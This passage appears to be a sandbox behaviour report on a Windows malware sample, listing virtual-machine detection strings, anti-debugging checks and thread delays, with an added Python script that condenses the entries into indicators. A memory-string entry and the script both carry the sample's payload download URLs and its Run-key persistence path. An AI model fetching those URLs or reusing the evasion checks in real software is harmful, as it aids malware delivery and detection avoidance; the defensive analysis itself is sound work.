Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.dll
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA26DE6 rdtsc 19_2_1EA26DE6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4089
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2858
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe API coverage: 5.6 %
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation
Source: powershell.exe, 0000000D.00000003.873648723.000000000547C000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 00000015.00000000.1043640137.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: ieinstal.exe, 00000013.00000003.996326865.0000000002D7C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.1058515424.0000000002D7C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061456480.0000000002D7C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000015.00000000.1021896089.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000015.00000000.1006326818.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: powershell.exe, 0000000D.00000002.1026909764.0000000007B1D000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.947961634.0000000007B16000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.947999087.0000000007B1C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 0000000D.00000003.948189598.0000000007A86000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1026417858.0000000007A80000.00000004.00000001.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe~
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: explorer.exe, 00000015.00000000.1043887336.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 0000000D.00000003.873648723.000000000547C000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.1021820961.0000000004E66000.00000004.00000001.sdmp Binary or memory string: }l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 00000015.00000000.1040207828.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: explorer.exe, 00000015.00000000.1031820624.000000000FCB2000.00000004.00000001.sdmp Binary or memory string: 6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAd
Source: explorer.exe, 00000015.00000000.1046821539.000000000FCF2000.00000004.00000001.sdmp Binary or memory string: 6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAg
Source: wscript.exe, 00000001.00000003.816908505.000001E57788D000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}&
Source: ieinstal.exe, 00000013.00000003.996326865.0000000002D7C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000003.1058515424.0000000002D7C000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.1061456480.0000000002D7C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWpFcy
Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunStartup keyhttps://owanlab.com/bin_DziiNe252.binhttps://gsmservice.tech/bin_DziiNe252.bin
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: ieinstal.exe, 00000013.00000002.1061988822.00000000047BA000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat
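The evasion entries above (the qemu-ga.exe / qga.exe guest-agent probes, the concatenated loader strings that carry the payload URLs and the Run key, the back-to-back RDTSC pairs) and the anti-debugging entries that follow (HideFromDebugger, the long run of fs:[00000030h] PEB reads) are easier to act on once they are deduplicated into indicators. The Python script below is an added example, not Joe Sandbox tooling and not code from the sample; it assumes the plain-text export keeps the "Source: <process or dump> <event kind>: <detail>" layout shown on this page (with or without the trailing "Jump to behavior" link text), and the sample lines it embeds are constructed copies of entries from this report. The list of guest-agent binaries is limited to the two this sample probes; extending it to other hypervisors is left as an assumption.

```python
"""Condense Joe Sandbox 'Source: ...' behaviour lines into one indicator record.

Added example for this report, not Joe Sandbox tooling. It assumes the
plain-text export keeps the layout seen on this page:
'Source: <process or memory dump> <event kind>: <detail>', optionally
followed by the 'Jump to behavior' link text.
"""
import re

# Constructed sample: a handful of lines copied from this report's evasion and
# anti-debugging sections (raw strings, so the backslashes stay literal).
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior",
    r"Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior",
    r"Source: ieinstal.exe, 00000013.00000002.1061746994.0000000002EA0000.00000004.00000001.sdmp Binary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunStartup keyhttps://owanlab.com/bin_DziiNe252.binhttps://gsmservice.tech/bin_DziiNe252.bin",
    r"Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread information set: HideFromDebugger Jump to behavior",
    r"Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06",
    r"Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06",
    r"Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA66C0A mov eax, dword ptr fs:[00000030h] 19_2_1EA66C0A",
    r"Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc",
    "Malware Analysis System Evasion",  # a section heading; must be ignored
]

EVENT_KINDS = (
    "File opened", "Binary or memory string", "Thread information set",
    "Process token adjusted", "Code function", "RDTSC instruction interceptor",
    "Thread delayed",
)
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) (?P<kind>" + "|".join(map(re.escape, EVENT_KINDS))
    + r"): (?P<detail>.*?)(?: Jump to (?:behavior|dropped file))?$"
)
# Loader strings sit back to back in the dump, so a URL ends where the next one starts.
URL_RE = re.compile(r"https?://.+?(?=https?://|$)")
EXE_PATH_RE = re.compile(r"[A-Z]:\\Program Files\\[^\\]+?\\[\w-]+?\.exe", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"Software\\Microsoft\\Windows\\CurrentVersion\\Run", re.IGNORECASE)
# "19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06": function id, asm, id again.
FUNC_RE = re.compile(r"^(?P<func>\d+_\d+_[0-9A-F]+) (?P<asm>.+?) (?P=func)$")
# Guest-agent binaries this sample probes for; extending the set is an assumption.
GUEST_AGENTS = {"qemu-ga.exe", "qga.exe"}


def parse_line(line):
    """Return (source, kind, detail) for a behaviour line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    return (m.group("src"), m.group("kind"), m.group("detail")) if m else None


def is_guest_agent_path(path):
    return path.rsplit("\\", 1)[-1].lower() in GUEST_AGENTS


def extract_config_strings(blob):
    """Pull C2 URLs, probed guest-agent paths and the Run-key marker out of a memory string."""
    return {
        "c2_urls": URL_RE.findall(blob),
        "sandbox_probes": [p for p in EXE_PATH_RE.findall(blob) if is_guest_agent_path(p)],
        "run_key": RUN_KEY_RE.search(blob) is not None,
    }


def summarize(lines):
    """Deduplicate the evasion and anti-debug evidence into a single indicator record."""
    rec = {"c2_urls": [], "sandbox_probes": set(), "run_key_persistence": False,
           "peb_functions": set(), "hide_from_debugger": set(), "rdtsc_checks": 0}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, kind, detail = parsed
        if kind == "File opened" and is_guest_agent_path(detail):
            rec["sandbox_probes"].add(detail)
        elif kind == "Binary or memory string":
            cfg = extract_config_strings(detail)
            rec["c2_urls"] += [u for u in cfg["c2_urls"] if u not in rec["c2_urls"]]
            rec["sandbox_probes"].update(cfg["sandbox_probes"])
            rec["run_key_persistence"] |= cfg["run_key"]
        elif kind == "Thread information set" and detail == "HideFromDebugger":
            rec["hide_from_debugger"].add(src)
        elif kind == "Code function":
            fm = FUNC_RE.match(detail)
            # fs:[30h] is the PEB on 32-bit Windows; an inline read of it is the classic
            # BeingDebugged / NtGlobalFlag check, so count distinct functions, not hits.
            if fm and "fs:[00000030h]" in fm.group("asm"):
                rec["peb_functions"].add(fm.group("func"))
        elif kind == "RDTSC instruction interceptor":
            rec["rdtsc_checks"] += 1
    return rec


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LINES).items():
        print(f"{key}: {sorted(value) if isinstance(value, set) else value}")
```

Run against the full export, the record collapses the ~170 "Code function" entries below into a short set of function ids, and the two payload URLs and the Run key come out of the memory-string entry as blockable indicators rather than one long unbroken string.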

Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA26DE6 rdtsc 19_2_1EA26DE6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA646A7 mov eax, dword ptr fs:[00000030h] 19_2_1EA646A7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB0EA5 mov eax, dword ptr fs:[00000030h] 19_2_1EAB0EA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB0EA5 mov eax, dword ptr fs:[00000030h] 19_2_1EAB0EA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB0EA5 mov eax, dword ptr fs:[00000030h] 19_2_1EAB0EA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA7FE87 mov eax, dword ptr fs:[00000030h] 19_2_1EA7FE87
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA116E0 mov ecx, dword ptr fs:[00000030h] 19_2_1EA116E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA28EC7 mov eax, dword ptr fs:[00000030h] 19_2_1EA28EC7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA9FEC0 mov eax, dword ptr fs:[00000030h] 19_2_1EA9FEC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA136CC mov eax, dword ptr fs:[00000030h] 19_2_1EA136CC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9F76E2 mov eax, dword ptr fs:[00000030h] 19_2_1E9F76E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB8ED6 mov eax, dword ptr fs:[00000030h] 19_2_1EAB8ED6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA9FE3F mov eax, dword ptr fs:[00000030h] 19_2_1EA9FE3F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9EC600 mov eax, dword ptr fs:[00000030h] 19_2_1E9EC600
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9EC600 mov eax, dword ptr fs:[00000030h] 19_2_1E9EC600
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9EC600 mov eax, dword ptr fs:[00000030h] 19_2_1E9EC600
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA18E00 mov eax, dword ptr fs:[00000030h] 19_2_1EA18E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1608 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1608
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA1A61C mov eax, dword ptr fs:[00000030h] 19_2_1EA1A61C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA1A61C mov eax, dword ptr fs:[00000030h] 19_2_1EA1A61C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9EE620 mov eax, dword ptr fs:[00000030h] 19_2_1E9EE620
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA0AE73 mov eax, dword ptr fs:[00000030h] 19_2_1EA0AE73
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA0AE73 mov eax, dword ptr fs:[00000030h] 19_2_1EA0AE73
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA0AE73 mov eax, dword ptr fs:[00000030h] 19_2_1EA0AE73
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA0AE73 mov eax, dword ptr fs:[00000030h] 19_2_1EA0AE73
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA0AE73 mov eax, dword ptr fs:[00000030h] 19_2_1EA0AE73
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9F7E41 mov eax, dword ptr fs:[00000030h] 19_2_1E9F7E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9F7E41 mov eax, dword ptr fs:[00000030h] 19_2_1E9F7E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9F7E41 mov eax, dword ptr fs:[00000030h] 19_2_1E9F7E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9F7E41 mov eax, dword ptr fs:[00000030h] 19_2_1E9F7E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9F7E41 mov eax, dword ptr fs:[00000030h] 19_2_1E9F7E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9F7E41 mov eax, dword ptr fs:[00000030h] 19_2_1E9F7E41
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAAAE44 mov eax, dword ptr fs:[00000030h] 19_2_1EAAAE44
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAAAE44 mov eax, dword ptr fs:[00000030h] 19_2_1EAAAE44
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9F766D mov eax, dword ptr fs:[00000030h] 19_2_1E9F766D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9F8794 mov eax, dword ptr fs:[00000030h] 19_2_1E9F8794
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA67794 mov eax, dword ptr fs:[00000030h] 19_2_1EA67794
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA67794 mov eax, dword ptr fs:[00000030h] 19_2_1EA67794
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA67794 mov eax, dword ptr fs:[00000030h] 19_2_1EA67794
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA237F5 mov eax, dword ptr fs:[00000030h] 19_2_1EA237F5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA1E730 mov eax, dword ptr fs:[00000030h] 19_2_1EA1E730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB070D mov eax, dword ptr fs:[00000030h] 19_2_1EAB070D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB070D mov eax, dword ptr fs:[00000030h] 19_2_1EAB070D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA1A70E mov eax, dword ptr fs:[00000030h] 19_2_1EA1A70E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA1A70E mov eax, dword ptr fs:[00000030h] 19_2_1EA1A70E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9E4F2E mov eax, dword ptr fs:[00000030h] 19_2_1E9E4F2E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9E4F2E mov eax, dword ptr fs:[00000030h] 19_2_1E9E4F2E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA0F716 mov eax, dword ptr fs:[00000030h] 19_2_1EA0F716
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA7FF10 mov eax, dword ptr fs:[00000030h] 19_2_1EA7FF10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA7FF10 mov eax, dword ptr fs:[00000030h] 19_2_1EA7FF10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB8F6A mov eax, dword ptr fs:[00000030h] 19_2_1EAB8F6A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9FEF40 mov eax, dword ptr fs:[00000030h] 19_2_1E9FEF40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9FFF60 mov eax, dword ptr fs:[00000030h] 19_2_1E9FFF60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9F849B mov eax, dword ptr fs:[00000030h] 19_2_1E9F849B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA14FB mov eax, dword ptr fs:[00000030h] 19_2_1EAA14FB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA66CF0 mov eax, dword ptr fs:[00000030h] 19_2_1EA66CF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA66CF0 mov eax, dword ptr fs:[00000030h] 19_2_1EA66CF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA66CF0 mov eax, dword ptr fs:[00000030h] 19_2_1EA66CF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB8CD6 mov eax, dword ptr fs:[00000030h] 19_2_1EAB8CD6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA1BC2C mov eax, dword ptr fs:[00000030h] 19_2_1EA1BC2C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB740D mov eax, dword ptr fs:[00000030h] 19_2_1EAB740D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB740D mov eax, dword ptr fs:[00000030h] 19_2_1EAB740D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB740D mov eax, dword ptr fs:[00000030h] 19_2_1EAB740D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAA1C06 mov eax, dword ptr fs:[00000030h] 19_2_1EAA1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA66C0A mov eax, dword ptr fs:[00000030h] 19_2_1EA66C0A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA66C0A mov eax, dword ptr fs:[00000030h] 19_2_1EA66C0A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA66C0A mov eax, dword ptr fs:[00000030h] 19_2_1EA66C0A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA66C0A mov eax, dword ptr fs:[00000030h] 19_2_1EA66C0A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA0746D mov eax, dword ptr fs:[00000030h] 19_2_1EA0746D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA1A44B mov eax, dword ptr fs:[00000030h] 19_2_1EA1A44B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA7C450 mov eax, dword ptr fs:[00000030h] 19_2_1EA7C450
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA7C450 mov eax, dword ptr fs:[00000030h] 19_2_1EA7C450
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA135A1 mov eax, dword ptr fs:[00000030h] 19_2_1EA135A1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB05AC mov eax, dword ptr fs:[00000030h] 19_2_1EAB05AC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EAB05AC mov eax, dword ptr fs:[00000030h] 19_2_1EAB05AC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9E2D8A mov eax, dword ptr fs:[00000030h] 19_2_1E9E2D8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9E2D8A mov eax, dword ptr fs:[00000030h] 19_2_1E9E2D8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9E2D8A mov eax, dword ptr fs:[00000030h] 19_2_1E9E2D8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9E2D8A mov eax, dword ptr fs:[00000030h] 19_2_1E9E2D8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1E9E2D8A mov eax, dword ptr fs:[00000030h] 19_2_1E9E2D8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA11DB5 mov eax, dword ptr fs:[00000030h] 19_2_1EA11DB5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA11DB5 mov eax, dword ptr fs:[00000030h] 19_2_1EA11DB5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA11DB5 mov eax, dword ptr fs:[00000030h] 19_2_1EA11DB5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA12581 mov eax, dword ptr fs:[00000030h] 19_2_1EA12581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA12581 mov eax, dword ptr fs:[00000030h] 19_2_1EA12581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA12581 mov eax, dword ptr fs:[00000030h] 19_2_1EA12581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA12581 mov eax, dword ptr fs:[00000030h] 19_2_1EA12581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA1FD9B mov eax, dword ptr fs:[00000030h] 19_2_1EA1FD9B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 19_2_1EA1FD9B mov eax, dword ptr fs:[00000030h] 19_2_1EA1FD9B
